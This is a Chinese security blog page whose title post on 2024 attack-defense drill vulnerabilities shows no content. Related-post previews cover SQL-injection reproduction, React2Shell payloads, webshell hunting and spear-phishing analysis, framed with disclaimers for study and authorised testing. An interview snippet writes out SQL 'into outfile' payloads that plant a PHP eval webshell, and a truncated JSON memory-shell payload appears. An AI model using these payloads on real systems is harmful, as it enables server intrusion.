亚信安全2024攻防演练高危漏洞合集
发表于|更新于|安全
|总字数:21|阅读时长:1分钟|浏览量:
亚信安全2024攻防演练高危漏洞合集
预览
文章作者: Mo Shang
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 M's Blog!
相关推荐
2025-12-19
帆软 export/excel SQL注入漏洞复现
帆软 export/excel SQL注入漏洞复现 免责声明 本文的知识内容,仅供网络安全从业人员学习参考 用于已获得合法授权的网站测试,请勿用于其它用途 请勿使用本文中的工具、技术及资料, 对任何未经授权的网站、系统进行测试, 否则,所造成的直接或间接后果, 均由您自行承担 2025-10-23日,帆软出现了一个 export/excel SQL 注入漏洞,今天来进行复现。 打开源代码发现,export/excel 实际上有两个接口: v10 接口: 1234567@RequestMapping( value = {"/report/v10/largedataset/export/excel"}, method = {RequestMethod.POST})public void largedsExcelExport(HttpServletRequest var1, HttpServletResponse var2) thro...
2025-03-13
明源云接口管家文件上传审计
2025-12-05
React2Shell的一些payload
React2Shell的一些payload 免责声明 本文的知识内容,仅供网络安全从业人员学习参考 用于已获得合法授权的网站测试,请勿用于其它用途 请勿使用本文中的工具、技术及资料, 对任何未经授权的网站、系统进行测试, 否则,所造成的直接或间接后果, 均由您自行承担 内存马12345678910111213{ "then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": { "_prefix": "(async()=>{con...
2024-05-28
玄机靶场--1.webshell查杀
玄机靶场–1.webshell查杀我们先启动环境 开启环境后会有IP地址 账号密码就在概述里面 使用SSH链接靶机,然后查看开启的端口 端口显示有80,22,3306,有web服务 然后查找目录,进入根目录用 1find -name index.html 查找到在/var/www/html目录下 现在本地靶机进行河马webshell扫描 然后发现扫描不到,只有一个一句话木马,无法进行外网访问,我们另起他法,将目录打包到本地 然后在在线扫描再试试看(其实我本地杀软已经报毒了,但是还是在河马在线扫描进行了一次扫描)地址链接 一共扫描出5个结果 1、黑客webshell里面的flag一个疑似PHP命令执行webshell,一个是PHP命令执行webshell 我们先打开这个比较确定的 里面有一串注释就是webshell里面的flag了 2、黑客使用的什么工具的shell github地址的md5然后上面gz.php代码一眼望去—哥斯拉(具体请看别的大佬的webshell管理工具分析分析) 1234567891011121314151...
2024-09-15
解密希拉里”邮件门”中鱼叉钓鱼攻击的技术细节
Part1 前言大家好,我是ABC_123。近几年无论是APT攻击还是日常各种攻防比赛,邮件钓鱼、鱼叉攻击一直都是常用的攻击手段,其中最出名且影响最大的实战案例莫过于“希拉里邮件门事件”,直接影响了美国总统大选结果,导致希拉里竞选总统失败。尽管这一事件几乎人人皆知,但其中涉及的鱼叉钓鱼攻击的技术细节却鲜有文章详细描述。经过翻阅大量资料,ABC_123今天为大家分析这个重要的鱼叉钓鱼邮件攻击案例,希望能够提升大家防范钓鱼邮件的意识。 注:文末提到的Xkeyscore关键得分系统请参考ABC_123的这篇原创文章《第100篇:美国NSA全球个人信息检索系统XKeyscore关键得分的介绍》,有详细介绍。 Part2 技术研究过程 希拉里邮件门事件介绍 “希拉里邮件门”事件最初指的是希拉里·克林顿在担任美国国务卿期间,使用私人电子邮件服务器处理与政府工作相关的邮件。随后在2016年10月7日,在希拉里竞选总统期间,希拉里总统竞选团队的负责人约翰·波德斯塔 (John Podesta) 的私人Gmail邮箱密码被某APT组织使用鱼叉攻击窃取,导致2万多封邮件被窃取,部分内容是绝密的...
2024-04-04
记一次国护面试题
记一次国护面试题先看简历,然后根据你的项目经验去先问一些针对性问题,这些就自由回答了。 问:绕过白名单的方式 答: 100截断 问:00截断应该写在哪里 答: 1放在文件上传的路径后面 问:你一般如何用sql写入webshell呢 答: 12345678910常见的仅适用于联合注入。union 跟 select into outfileunion select 1,"<?php @eval($_POST['xxxx']);?>",3 into outfile 'D:\\www\\WWWroot\\hack.php'或者写入到表,然后在导出为文件写入到日志里盲注或者报错常用分隔符注入into outfile 'D:\\www\\WWWroot\\hack.php' lines terminated by '<?php @eval($_POST['xxxx']);?>' 还有一些这些大佬blog写的更全可以学习 SQL注入写入websh...
公告
海不择细流,故能成其大;山不拒细壤,方能就其高。一个希望在网络安全有建树的菜狗.✍️
